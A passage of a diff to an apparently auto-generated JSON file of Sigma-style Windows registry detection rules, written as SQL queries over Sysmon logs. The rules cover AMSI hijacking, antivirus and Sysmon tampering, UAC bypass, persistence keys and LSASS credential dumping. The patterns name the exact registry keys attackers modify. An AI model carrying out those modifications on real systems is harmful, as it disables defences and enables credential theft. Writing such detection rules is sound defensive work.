ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE 
'%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_amsi_com_hijack.yml" - }, - { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", - "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is 
started.", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" - ], - "filename": "registry_set_persistence_xll.yml" - }, - { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": 
"1547e27c-3974-43e2-a7d7-7f484fb928ec", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "Shell Open 
Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" - ], - "filename": "registry_set_uac_bypass_wmp.yml" - }, - { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" - ], - "filename": "registry_set_disable_macroruntimescanscope.yml" - }, - { - "title": "Set 
TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" - ], - "filename": "registry_set_timeproviders_dllname.yml" - }, - { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "falsepositives": [ - "Software using weird folders for updates" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details 
LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_run_key_img_folder.yml" - }, - { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_fax_dll_persistance.yml" - }, - { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 
'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ], - "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' 
AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_printer_driver.yml" - }, - { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", - "tags": [ - "attack.impact", - "attack.t1490" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" - ], - "filename": "registry_set_disable_system_restore.yml" - }, - { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" - ], - "filename": "registry_set_add_port_monitor.yml" - }, - { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", - "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT 
((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" - ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" - }, - { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. 
If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" - ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" - }, - { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" + "description": "Detects the volume shadow copy service initialization and processing via esentutl. 
Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", - "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. 
But this is not a common occurrence in an environment and should be investigated either way" + "Legitimate administrators removing applications (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", - "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "status": "test", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_typed_paths.yml" + 